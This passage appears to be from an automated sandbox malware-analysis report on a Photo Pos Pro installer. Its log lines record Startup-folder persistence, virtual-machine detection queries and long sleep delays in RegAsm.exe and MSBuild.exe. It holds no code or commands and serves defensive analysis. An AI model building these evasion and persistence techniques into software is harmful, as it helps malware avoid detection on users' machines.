                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -57110s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56985s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56657s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56388s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56280s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -56146s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55931s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55802s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55686s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55419s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -55282s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -54938s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -54528s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -53868s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -53630s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -53433s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -311000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59826s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59519s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -313000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59783s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59537s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -486000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59726s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -434000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59795s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59662s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59506s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -452000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59798s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59667s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59527s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -544000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59775s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59571s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -441000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59817s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -540000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59971s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59780s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59530s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59376s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -491000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59949s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59774s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59642s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59513s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -576000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59855s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59736s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59551s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -332000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59722s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59469s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -437000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59862s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59742s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59627s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59489s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -381000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59754s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59629s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59498s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -413000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59428s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -504000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59837s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59686s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59575s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59467s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59355s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7764Thread sleep time: -390000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59889s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800Thread sleep time: -59784s >= -30000s
                  Source: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4944Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6912Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6916Thread sleep count: 9600 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7420Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_00421238 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0002h and CTI: jbe 004212F0h6_2_00421238
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_00421238 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0002h and CTI: jbe 004212F0h14_2_00421238
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6 FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6 FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6 FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6 FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033E090 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_0033E090
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003402E0 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_003402E0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00314D70 FindFirstFileW,GetLastError,FindClose,0_2_00314D70
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001D4DD0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_001D4DD0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033D390 FindFirstFileW,FindClose,DeleteFileW,GetLastError,0_2_0033D390
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033A320 FindFirstFileW,FindClose,0_2_0033A320
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0035E410 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_0035E410
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00314440 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00314440
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00322D10 FindFirstFileW,FindClose,FindClose,0_2_00322D10
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040F6DB lstrlenA,lstrlenA,lstrcpyA,lstrcatA,FindFirstFileA,FindClose,lstrlenA,FindClose,lstrcpyA,lstrcatA,lstrlenA,lstrcmpiA,FindNextFileA,FindClose,FindClose,lstrlenA,lstrcpyA,FindClose,6_2_0040F6DB
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040C689 FindFirstFileA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,lstrcmpiA,SendDlgItemMessageA,FindNextFileA,FindClose,6_2_0040C689
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B793AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF71B793AE4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0040C689 FindFirstFileA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,lstrcmpiA,SendDlgItemMessageA,FindNextFileA,FindClose,14_2_0040C689
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0040F6DB lstrlenA,lstrlenA,lstrcpyA,lstrcatA,FindFirstFileA,FindClose,lstrlenA,FindClose,lstrcpyA,lstrcatA,lstrlenA,lstrcmpiA,FindNextFileA,FindClose,FindClose,lstrlenA,lstrcpyA,FindClose,14_2_0040F6DB
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F8930 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,0_2_001F8930
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003DDDB2 VirtualQuery,GetSystemInfo,0_2_003DDDB2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 60000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59873
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59542
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59412
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58333
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58212
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 58056
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57954
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57829
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57704
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57579
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 57110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56657
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 56146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55931
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55419
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 55282
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 54938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 54528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 53868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 53630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 53433
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 311000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59826
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59519
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 313000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59783
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59537
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 486000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59726
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 434000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59662
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59506
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 452000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59667
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59527
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 544000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59775
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59571
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 441000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59817
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 540000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59971
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59376
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 491000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59949
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59774
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59642
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59513
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 576000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59855
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59736
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59551
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 332000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 437000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59862
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59742
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59627
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 59489
